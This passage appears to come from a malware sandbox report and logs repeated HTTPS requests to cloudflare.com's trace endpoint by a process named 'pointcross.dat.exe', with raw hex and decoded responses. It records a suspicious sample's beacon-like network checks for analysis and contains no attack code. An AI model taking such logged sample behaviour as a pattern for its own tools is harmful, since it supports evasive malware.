2023-11-27 09:11:57 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 35 37 33 66 36 31 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 31 37 2e 34 36 33 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=573f61h=cloudflare.comip=89.149.18.60ts=1701076317.463visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:11:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:11:58 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:11:58 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 31 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 33 66 32 65 32 66 35 34 35 37 31 36 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:11:58 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c93f2e2f545716-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:11:58 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 33 35 34 66 31 39 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 31 38 2e 34 32 37 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=354f19h=cloudflare.comip=89.149.18.60ts=1701076318.427visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:11:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:02 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:02 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 33 66 34 37 31 61 34 37 38 32 65 37 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:02 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c93f471a4782e7-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:02 UTC	223	IN	Data Raw: 64 39 0d 0a 66 6c 3d 34 31 33 66 34 32 31 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 32 32 2e 34 31 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 30 31 30 2d 74 69 65 72 31 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d9fl=413f421h=cloudflare.comip=89.149.18.60ts=1701076322.418visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=010-tier1http=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:06 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:06 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 33 66 35 66 64 63 61 64 30 39 34 30 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:06 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c93f5fdcad0940-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:06 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 31 36 66 31 31 38 31 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 32 36 2e 33 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=16f1181h=cloudflare.comip=89.149.18.60ts=1701076326.38visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49736	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:11 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:11 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 33 66 38 30 64 66 36 33 30 38 33 36 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:11 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c93f80df630836-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:11 UTC	218	IN	Data Raw: 64 34 0d 0a 66 6c 3d 36 32 36 66 32 30 32 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 33 31 2e 36 35 37 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d4fl=626f202h=cloudflare.comip=89.149.18.60ts=1701076331.657visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:15 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:15 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 33 66 39 39 62 66 38 33 35 61 32 38 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:15 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c93f99bf835a28-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:15 UTC	216	IN	Data Raw: 64 32 0d 0a 66 6c 3d 33 35 30 66 38 34 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 33 35 2e 36 34 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d2fl=350f84h=cloudflare.comip=89.149.18.60ts=1701076335.64visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:19 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:19 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 33 66 62 32 38 39 39 39 35 38 30 33 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:19 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c93fb289995803-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:19 UTC	222	IN	Data Raw: 64 38 0d 0a 66 6c 3d 31 36 66 37 34 38 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 33 39 2e 36 30 34 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 30 30 35 2d 74 69 65 72 31 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d8fl=16f748h=cloudflare.comip=89.149.18.60ts=1701076339.604visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=005-tier1http=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:23 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:23 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 33 66 63 62 35 39 63 33 38 32 65 64 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:23 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c93fcb59c382ed-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:23 UTC	222	IN	Data Raw: 64 38 0d 0a 66 6c 3d 34 31 33 66 34 32 34 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 34 33 2e 35 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 30 31 30 2d 74 69 65 72 31 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d8fl=413f424h=cloudflare.comip=89.149.18.60ts=1701076343.58visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=010-tier1http=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:28 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:28 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 33 66 65 63 36 66 39 37 35 39 35 62 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:28 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c93fec6f97595b-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:28 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 33 35 30 66 31 35 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 34 38 2e 38 36 32 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=350f15h=cloudflare.comip=89.149.18.60ts=1701076348.862visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:32 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:32 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 30 35 33 65 64 66 30 35 65 37 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 